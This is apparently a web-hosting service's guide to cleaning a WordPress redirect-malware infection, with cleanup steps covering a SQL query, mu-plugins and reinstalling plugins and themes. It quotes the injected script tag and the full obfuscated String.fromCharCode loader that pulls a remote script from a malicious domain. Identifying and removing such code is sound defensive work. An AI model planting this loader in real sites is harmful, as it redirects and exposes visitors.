How To Fix WordPress Malware Redirect Hack?

If your site redirects visitors to some ugly-looking webpages this virus may exist in your site. There might be some hacking going on currently. It can be due to any backdoors.


You might find following scripts embedded in your site everywhere

<script src='https://scripts(dot)lowerbeforwarden(dot)ml/src.js?n=ns1' type='text/javascript'></script>

encrypted version of malware script

<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script></head>

Steps to fix redirection malware like


Create a backup of your whole site including Database before changing any code and then try the following steps –

Step 1 – First, Delete _a or _f or _2 etc ……. file from your sites home dedicatory

Step 2 – Delete if you spot any malicious code in Mu-Plugins Folder under WP-Contents – For example, you can see rms_unique_wp_mu_pl_fl_nm.php virus file in the image provided below.


Step 3 – Go to PhpMyAdmin. Choose the right database and run the following SQL query to remove scripts from WP_Posts tables. Make sure to change the script accordingly the identified one in your case.


UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src=’https://scripts(dot)lowerbeforwarden(dot)ml/src.js?n=ns1′ type=’text/javascript’></script>”, “”));


You may ask why we need to do this? You can refer to the provided image below. We have identified such scripts at the bottom of every post for our clients.



Step 4 – Check your site URL and home URL from WP_Options table and make sure to verify if it is correct. This is the prime reason when you open your website it will redirect you to multiple sites which may ask you to confirm your identity again and again.

Here is an example for this – You can see the below script is added in site URL.



We hope that this will help you to fix all these (,,, malware from your website.

Step 5 – Make a list of your plugins from the WP-Content/plugins folder and delete them. Once all deleted upload a fresh copy once again.

This can be done following these steps –

  1. Delete the current plugin folders
  2. Upload the plugin zip file in same directory
  3. Extract the zip file and delete the uploaded zip

You can activate all these plugins, once you have access to the WP Dashboard.

Note – You don’t need to worry about plugins setup. The data will be secure as it is saved in the database.

Step 6 – Delete the currently active theme folder from the WP-Content/Themes folder and upload a fresh one. If you have child theme activated then make sure to upload and extract them as well.

Delete any other copy of the theme that is not in use. You can keep twenty twenty theme as debugging purpose.

Step 7 – Check all of the index.php files and verify it is not containing any such malware scripts like

These are some common steps that we have followed to fix many websites. You may need to do some other work as well depending on malware type.


If you can’t fix it get in touch with us now immediately.

Written by